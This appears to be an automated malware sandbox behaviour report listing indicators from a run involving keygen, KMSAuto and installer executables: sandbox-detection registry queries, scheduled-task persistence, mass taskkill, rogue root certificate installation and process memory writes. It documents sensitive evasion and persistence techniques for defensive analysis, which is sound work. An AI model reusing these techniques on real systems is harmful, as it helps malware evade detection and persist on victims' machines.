Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000	AD754B4D3FE2C4EE.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\	svchost.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

C1FD.tmp.exeB878.tmp.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	C1FD.tmp.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	B878.tmp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	B878.tmp.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	C1FD.tmp.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

7096 schtasks.exe
6980 schtasks.exe

pid	process
7096	schtasks.exe
6980	schtasks.exe

Delays execution with timeout.exe 13 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid	process
12512	timeout.exe
4376	timeout.exe
13416	timeout.exe
6136	timeout.exe
7044	timeout.exe
6824	timeout.exe
14084	timeout.exe
19800	timeout.exe
7404	timeout.exe
17376	timeout.exe
13344
5376
3276

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

System Information Discovery

Processes:

multitimer.exemultitimer.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	multitimer.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	multitimer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	multitimer.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	multitimer.exe

Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

NETSTAT.EXE

pid process

4776 NETSTAT.EXE

pid	process
4776	NETSTAT.EXE

Kills process with taskkill 51 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exeTASKKILL.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
356	taskkill.exe
13384	taskkill.exe
17348
1808	taskkill.exe
4268	taskkill.exe
18012	TASKKILL.exe
10948	taskkill.exe
10252	taskkill.exe
14944	taskkill.exe
12600	taskkill.exe
4152	taskkill.exe
14928	taskkill.exe
14524	taskkill.exe
18748	taskkill.exe
14364	taskkill.exe
7852	taskkill.exe
18328	taskkill.exe
9928
4792	taskkill.exe
6140	taskkill.exe
7748	taskkill.exe
4588	taskkill.exe
9512	taskkill.exe
18332	taskkill.exe
6500	taskkill.exe
13820	taskkill.exe
212	taskkill.exe
13192	taskkill.exe
6016	taskkill.exe
8664	taskkill.exe
6320	taskkill.exe
7220	taskkill.exe
19572
3620	taskkill.exe
5468	taskkill.exe
13116	taskkill.exe
16188	taskkill.exe
13808	taskkill.exe
15532	taskkill.exe
18440
4928	taskkill.exe
7580	taskkill.exe
12508	taskkill.exe
17688	taskkill.exe
14372	taskkill.exe
10204	taskkill.exe
15952
964	taskkill.exe
6128	taskkill.exe
2540	taskkill.exe
17868	taskkill.exe

Modifies data under HKEY_USERS 3 IoCs

Processes:

svchost.exefile.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\PegasPc	file.exe

Modifies registry class 2 IoCs

Processes:

Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe

Modifies system certificate store 2 TTPs 8 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

certmgr.execertmgr.exeSetup.exeaskinstall20.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98\Blob = 030000000100000014000000648384a4dee53d4c1c87e10d67cc99307ccc9c982000000001000000fe010000308201fa30820167a00302010202108ac1a3101349c28a4d33947cfcd07662300906052b0e03021d05003011310f300d06035504031306575a5465616d301e170d3136313130323138343730365a170d3339313233313233353935395a3011310f300d06035504031306575a5465616d30819f300d06092a864886f70d010101050003818d0030818902818100ad2f8aa939c3eb40d1d6de0509b9f4e7ebf8475b98c49e9fb4ad556d408e9b84e80d014078d65be351e8a5d84ce2e92e84504f82e09dfa6c8310b58955527cec2843039328b51891f2a09f70fd7e1348668a0af780f741a30254397e9135220d442704c2395810a0a65b6b4ec54558e26c468c6087fd3bb1a1de8414ade68aaf0203010001a35b305930130603551d25040c300a06082b0601050507030330420603551d01043b30398010106ac14d8cb580f787e68a2938ab9bf3a1133011310f300d06035504031306575a5465616d82108ac1a3101349c28a4d33947cfcd07662300906052b0e03021d050003818100601d9e4107becc4352d02281ec0764b2865e4ed60ee58228b7375d707730dede148e9ed41ce051c44d4e15d041cf8c601a054ca14b4a484f7dbaab409e1d75cebe6f8fa171e97e16eae94b6757da5c61b0b6f85ce2fea31f50d664cc5bc1a40476a44eddd5390357bc0d44c37b4969b5e4e923fee772afd4643b21ba918d40a8	certmgr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98	certmgr.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98\Blob = 030000000100000014000000648384a4dee53d4c1c87e10d67cc99307ccc9c982000000001000000fe010000308201fa30820167a00302010202108ac1a3101349c28a4d33947cfcd07662300906052b0e03021d05003011310f300d06035504031306575a5465616d301e170d3136313130323138343730365a170d3339313233313233353935395a3011310f300d06035504031306575a5465616d30819f300d06092a864886f70d010101050003818d0030818902818100ad2f8aa939c3eb40d1d6de0509b9f4e7ebf8475b98c49e9fb4ad556d408e9b84e80d014078d65be351e8a5d84ce2e92e84504f82e09dfa6c8310b58955527cec2843039328b51891f2a09f70fd7e1348668a0af780f741a30254397e9135220d442704c2395810a0a65b6b4ec54558e26c468c6087fd3bb1a1de8414ade68aaf0203010001a35b305930130603551d25040c300a06082b0601050507030330420603551d01043b30398010106ac14d8cb580f787e68a2938ab9bf3a1133011310f300d06035504031306575a5465616d82108ac1a3101349c28a4d33947cfcd07662300906052b0e03021d050003818100601d9e4107becc4352d02281ec0764b2865e4ed60ee58228b7375d707730dede148e9ed41ce051c44d4e15d041cf8c601a054ca14b4a484f7dbaab409e1d75cebe6f8fa171e97e16eae94b6757da5c61b0b6f85ce2fea31f50d664cc5bc1a40476a44eddd5390357bc0d44c37b4969b5e4e923fee772afd4643b21ba918d40a8	certmgr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD	Setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576	Setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	askinstall20.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	askinstall20.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\648384A4DEE53D4C1C87E10D67CC99307CCC9C98	certmgr.exe

Runs .reg file with regedit 2 IoCs

Processes:

regedit.exeregedit.exe

pid process

18024 regedit.exe
11784 regedit.exe
Runs ping.exe 1 TTPs 7 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid process

3456 PING.EXE
3684 PING.EXE
4260 PING.EXE
5308 PING.EXE
7036 PING.EXE
4116 PING.EXE
4732 PING.EXE

pid	process
18024	regedit.exe
11784	regedit.exe

pid	process
3456	PING.EXE
3684	PING.EXE
4260	PING.EXE
5308	PING.EXE
7036	PING.EXE
4116	PING.EXE
4732	PING.EXE

Script User-Agent 56 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	291	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	348	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	768	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	880	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1026	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1517	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1548	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1518	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	186	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	330	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	907	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1235	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	779	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1704	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	151	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	786	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1650	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1700	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1721	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	990	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1947	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1962	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	319	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1976	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	148	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	374	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	782	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1810	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1443	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1315	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1335	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1601	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1845	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1034	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1229	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1345	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1407	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1434	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1537	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1604	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1664	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1715	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	694	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	873	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	913	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	982	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1452	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	144	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	194	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	688	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	772	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1334	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1895	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	385	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1460	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1669	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

KMSAuto Net.exe1615302222867.exekey.exe1615302227961.exemultitimer.exe

pid	process
1116	KMSAuto Net.exe
1116	KMSAuto Net.exe
1116	KMSAuto Net.exe
1428	1615302222867.exe
1428	1615302222867.exe
4640	key.exe
4640	key.exe
4076	1615302227961.exe
4076	1615302227961.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
1116	KMSAuto Net.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe
4516	multitimer.exe

Suspicious behavior: LoadsDriver 3 IoCs

Processes:

pid process

620
620
620

pid	process
620
620
620

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

AUDIODG.EXENETSTAT.EXEKMSAuto Net.exetaskkill.exetaskkill.exemsiexec.exemsiexec.exe

description	pid	process
Token: 33	3004	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	3004	AUDIODG.EXE
Token: SeDebugPrivilege	4776	NETSTAT.EXE
Token: SeDebugPrivilege	1116	KMSAuto Net.exe
Token: SeDebugPrivilege	1808	taskkill.exe
Token: SeDebugPrivilege	4792	taskkill.exe
Token: SeShutdownPrivilege	1316	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1316	msiexec.exe
Token: SeSecurityPrivilege	1900	msiexec.exe
Token: SeCreateTokenPrivilege	1316	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1316	msiexec.exe
Token: SeLockMemoryPrivilege	1316	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1316	msiexec.exe
Token: SeMachineAccountPrivilege	1316	msiexec.exe
Token: SeTcbPrivilege	1316	msiexec.exe
Token: SeSecurityPrivilege	1316	msiexec.exe
Token: SeTakeOwnershipPrivilege	1316	msiexec.exe
Token: SeLoadDriverPrivilege	1316	msiexec.exe
Token: SeSystemProfilePrivilege	1316	msiexec.exe
Token: SeSystemtimePrivilege	1316	msiexec.exe
Token: SeProfSingleProcessPrivilege	1316	msiexec.exe
Token: SeIncBasePriorityPrivilege	1316	msiexec.exe
Token: SeCreatePagefilePrivilege	1316	msiexec.exe
Token: SeCreatePermanentPrivilege	1316	msiexec.exe
Token: SeBackupPrivilege	1316	msiexec.exe
Token: SeRestorePrivilege	1316	msiexec.exe
Token: SeShutdownPrivilege	1316	msiexec.exe
Token: SeDebugPrivilege	1316	msiexec.exe
Token: SeAuditPrivilege	1316	msiexec.exe
Token: SeSystemEnvironmentPrivilege	1316	msiexec.exe
Token: SeChangeNotifyPrivilege	1316	msiexec.exe
Token: SeRemoteShutdownPrivilege	1316	msiexec.exe
Token: SeUndockPrivilege	1316	msiexec.exe
Token: SeSyncAgentPrivilege	1316	msiexec.exe
Token: SeEnableDelegationPrivilege	1316	msiexec.exe
Token: SeManageVolumePrivilege	1316	msiexec.exe
Token: SeImpersonatePrivilege	1316	msiexec.exe
Token: SeCreateGlobalPrivilege	1316	msiexec.exe
Token: SeCreateTokenPrivilege	1316	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1316	msiexec.exe
Token: SeLockMemoryPrivilege	1316	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1316	msiexec.exe
Token: SeMachineAccountPrivilege	1316	msiexec.exe
Token: SeTcbPrivilege	1316	msiexec.exe
Token: SeSecurityPrivilege	1316	msiexec.exe
Token: SeTakeOwnershipPrivilege	1316	msiexec.exe
Token: SeLoadDriverPrivilege	1316	msiexec.exe
Token: SeSystemProfilePrivilege	1316	msiexec.exe
Token: SeSystemtimePrivilege	1316	msiexec.exe
Token: SeProfSingleProcessPrivilege	1316	msiexec.exe
Token: SeIncBasePriorityPrivilege	1316	msiexec.exe
Token: SeCreatePagefilePrivilege	1316	msiexec.exe
Token: SeCreatePermanentPrivilege	1316	msiexec.exe
Token: SeBackupPrivilege	1316	msiexec.exe
Token: SeRestorePrivilege	1316	msiexec.exe
Token: SeShutdownPrivilege	1316	msiexec.exe
Token: SeDebugPrivilege	1316	msiexec.exe
Token: SeAuditPrivilege	1316	msiexec.exe
Token: SeSystemEnvironmentPrivilege	1316	msiexec.exe
Token: SeChangeNotifyPrivilege	1316	msiexec.exe
Token: SeRemoteShutdownPrivilege	1316	msiexec.exe
Token: SeUndockPrivilege	1316	msiexec.exe
Token: SeSyncAgentPrivilege	1316	msiexec.exe
Token: SeEnableDelegationPrivilege	1316	msiexec.exe

Suspicious use of FindShellTrayWindow 29 IoCs

Processes:

msiexec.exemsiexec.exeSetup3310.tmpjyqsk3wxebw.tmpchashepro3.tmpvict.tmpIBInstaller_97039.tmpvpn.tmpSetup3310.tmp

pid	process
1316	msiexec.exe
4936	msiexec.exe
4408	Setup3310.tmp
4364	jyqsk3wxebw.tmp
5132	chashepro3.tmp
5276	vict.tmp
5448	IBInstaller_97039.tmp
5440	vpn.tmp
6168	Setup3310.tmp
5440	vpn.tmp
5440	vpn.tmp
5440	vpn.tmp
5440	vpn.tmp
5440	vpn.tmp
5440	vpn.tmp
5440	vpn.tmp
5440	vpn.tmp
5440	vpn.tmp
5440	vpn.tmp
5440	vpn.tmp
5440	vpn.tmp
5440	vpn.tmp
5440	vpn.tmp
5440	vpn.tmp
5440	vpn.tmp
5440	vpn.tmp
5440	vpn.tmp
5440	vpn.tmp
5440	vpn.tmp

Suspicious use of SetWindowsHookEx 13 IoCs

Processes:

Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exewzt.datcertmgr.execertmgr.exebin.datAESDecoder.exebin_x64.datbin_x64.datbin_x64.datbin_x64.datbin_x64.datbin_x64.dat

pid	process
4716	Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe
4716	Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe
3624	wzt.dat
4344	certmgr.exe
2112	certmgr.exe
4232	bin.dat
4788	AESDecoder.exe
2304	bin_x64.dat
1088	bin_x64.dat
2024	bin_x64.dat
296	bin_x64.dat
1444	bin_x64.dat
1472	bin_x64.dat

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

KMSAuto Net.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 1116 wrote to memory of 1928	1116	KMSAuto Net.exe	cmd.exe
PID 1116 wrote to memory of 1928	1116	KMSAuto Net.exe	cmd.exe
